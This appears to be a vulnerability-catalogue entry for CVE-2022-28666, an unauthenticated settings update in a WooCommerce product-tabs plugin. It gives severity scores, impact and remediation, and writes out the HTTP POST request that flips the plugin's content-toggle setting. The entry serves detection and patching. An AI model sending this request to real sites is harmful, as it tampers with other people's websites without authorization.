🔙 목록으로 돌아가기

CVE-2022-28666: Custom Product Tabs for WooCommerce < 1.7.8 - Unauthenticated Toggle Content Setting Update

TitleCustom Product Tabs for WooCommerce < 1.7.8 - Unauthenticated Toggle Content Setting Update
AuthorSourabh-Sahu
SeverityMedium
ImpactAttackers can modify product tab content without authorization, potentially leading to content tampering or misinformation.
RemediationUpdate to the latest version of the plugin, above 1.7.7.
CVSS Score5.3
EPSS Score0.12792
CVE IDCVE-2022-28666
CWE IDCWE-287
Tags cve cve2022 wordpress wp-plugin wp custom_product_tabs_for_woocommerce vkev intrusive

🔍 Vulnerability Description

YIKES Inc. Custom Product Tabs for WooCommerce plugin \u003C= 1.7.7 contains a broken access control caused by improper permission checks in &yikes-the-content-toggle option update, letting attackers modify content without authorization.

🌐 HTTP Request

POST /wp-json/yikes/cpt/v1/settings HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 Edge/16.16299
Connection: close
Content-Length: 24
X-Requested-With: XMLHttpRequest
Accept-Encoding: gzip

toggle_the_content=false

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2022/CVE-2022-28666.yaml

🦈 Packet Capture: ⬇️ Download cve-2022-28666.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A